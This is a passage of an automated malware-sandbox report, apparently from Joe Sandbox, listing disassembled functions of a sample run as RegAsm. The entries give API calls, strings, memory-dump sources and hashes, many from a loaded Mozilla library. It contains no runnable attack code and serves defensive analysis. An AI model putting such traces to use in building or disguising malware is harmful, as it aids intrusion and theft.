                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                        • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                                                                                        • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                        • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                                                                                        Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SHFileOperationA.SHELL32(?), ref: 00412577
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileOperation
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3080627654-0
                                                                                                                                                        • Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                                                        • Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
                                                                                                                                                        • Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                                                        • Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9
                                                                                                                                                        Function 0041C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                        • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                        • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                                                                                        • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                        • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                                                                                        Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                        • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                        • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                                                        • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                        • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 6C615440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C615492
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6154A8
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6154BE
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C6154DB
                                                                                                                                                          • Part of subcall function 6C63AB3F: EnterCriticalSection.KERNEL32(6C68E370,?,?,6C603527,6C68F6CC,?,?,?,?,?,?,?,?,6C603284), ref: 6C63AB49
                                                                                                                                                          • Part of subcall function 6C63AB3F: LeaveCriticalSection.KERNEL32(6C68E370,?,6C603527,6C68F6CC,?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63AB7C
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C6154F9
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C615516
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C61556A
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C615577
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000070), ref: 6C615585
                                                                                                                                                        • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C615590
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6155E6
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C615606
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C615616
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C61563E
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C615646
                                                                                                                                                        • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C61567C
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C6156AE
                                                                                                                                                          • Part of subcall function 6C625E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C625EDB
                                                                                                                                                          • Part of subcall function 6C625E90: memset.VCRUNTIME140(ewfl,000000E5,?), ref: 6C625F27
                                                                                                                                                          • Part of subcall function 6C625E90: LeaveCriticalSection.KERNEL32(?), ref: 6C625FB2
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6156E8
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C615707
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C61570F
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C615729
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C61574E
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C61576B
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C615796
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6157B3
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6157CA
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C615749
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C615CF9
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C615AC9
                                                                                                                                                        • GeckoMain, xrefs: 6C615554, 6C6155D5
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C615717
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C615D01
                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6154A3
                                                                                                                                                        • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6156E3
                                                                                                                                                        • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C615724
                                                                                                                                                        • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6157C5
                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C61548D
                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6154B9
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C615D2B
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C615D24
                                                                                                                                                        • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6157AE
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C615B38
                                                                                                                                                        • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C615BBE
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C615C56
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C61584E
                                                                                                                                                        • MOZ_BASE_PROFILER_HELP, xrefs: 6C615511
                                                                                                                                                        • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C615766
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C615D1C
                                                                                                                                                        • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C615791
                                                                                                                                                        • [I %d/%d] profiler_init, xrefs: 6C61564E
                                                                                                                                                        • MOZ_PROFILER_STARTUP, xrefs: 6C6155E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                        • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                        • API String ID: 3686969729-1266492768
                                                                                                                                                        • Opcode ID: 3f5a898c5550ba3ccd22ef18c3955e64441f67c5635447c2a3ad9b2b93a5e1c8
                                                                                                                                                        • Instruction ID: 9b3eebca2a09816a9ad148be7ac935062ce6ce9232a696a570c1d45ebb3c07f0
                                                                                                                                                        • Opcode Fuzzy Hash: 3f5a898c5550ba3ccd22ef18c3955e64441f67c5635447c2a3ad9b2b93a5e1c8
                                                                                                                                                        • Instruction Fuzzy Hash: C4220670909340AFDB009F7AC89465AB7B4EF8734DF144A2AE94697F41E7318449CBAF
                                                                                                                                                        Function 6C616C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C616CCC
                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C616D11
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C616D26
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C616D35
                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C616D53
                                                                                                                                                        • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C616D73
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C616D80
                                                                                                                                                        • CertGetNameStringW.CRYPT32 ref: 6C616DC0
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C616DDC
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C616DEB
                                                                                                                                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C616DFF
                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C616E10
                                                                                                                                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C616E27
                                                                                                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C616E34
                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C616EF9
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C616F7D
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C616F8C
                                                                                                                                                        • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C61709D
                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C617103
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C617153
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C617176
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C617209
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61723A
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61726B
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61729C
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C6172DC
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61730D
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6173C2
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6173F3
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6173FF
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C617406
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C61740D
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C61741A
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C61755A
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C617568
                                                                                                                                                        • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C617585
                                                                                                                                                        • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C617598
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C6175AC
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                        • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                        • API String ID: 3256780453-3980470659
                                                                                                                                                        • Opcode ID: 471befc7dd6b72a89c959d630a0c39f7d28203c01940ba93425210834b5fa193
                                                                                                                                                        • Instruction ID: 776e54fa2c918ecea155374d5f2abefb529f8b7942cfe2e038167aa4728e9068
                                                                                                                                                        • Opcode Fuzzy Hash: 471befc7dd6b72a89c959d630a0c39f7d28203c01940ba93425210834b5fa193
                                                                                                                                                        • Instruction Fuzzy Hash: 175209B1A05314AFEB21CF29CC84BAA77BCEF46305F104599E50997A40DB70AF85CF69
                                                                                                                                                        Function 6C640DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C640F1F
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C640F99
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C640FB7
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C640FE9
                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C641031
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C6410D0
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C64117D
                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,?), ref: 6C641C39
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E744), ref: 6C643391
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E744), ref: 6C6433CD
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C643431
                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C643437
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6437A8
                                                                                                                                                        • : (malloc) Unsupported character in malloc options: ', xrefs: 6C643A02
                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6437BD
                                                                                                                                                        • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C643793
                                                                                                                                                        • MOZ_CRASH(), xrefs: 6C643950
                                                                                                                                                        • <jemalloc>, xrefs: 6C643941, 6C6439F1
                                                                                                                                                        • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C643559, 6C64382D, 6C643848
                                                                                                                                                        • Compile-time page size does not divide the runtime one., xrefs: 6C643946
                                                                                                                                                        • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6437D2
                                                                                                                                                        • MALLOC_OPTIONS, xrefs: 6C6435FE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                                                                        • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 3040639385-4173974723
                                                                                                                                                        • Opcode ID: 499fcf740a949e3361e6b6bd0b3e1e600db798932e96e550855fa7dbd7422eed
                                                                                                                                                        • Instruction ID: cce3376e1def342b42884a8866a2c33e757db5d759540a6421e82223492a5a20
                                                                                                                                                        • Opcode Fuzzy Hash: 499fcf740a949e3361e6b6bd0b3e1e600db798932e96e550855fa7dbd7422eed
                                                                                                                                                        • Instruction Fuzzy Hash: 2053AD71A057018FC704CF29C580616FBE1BF8A328F29C66DE869DB791D771E852CB89
                                                                                                                                                        Function 6C6634A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663527
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66355B
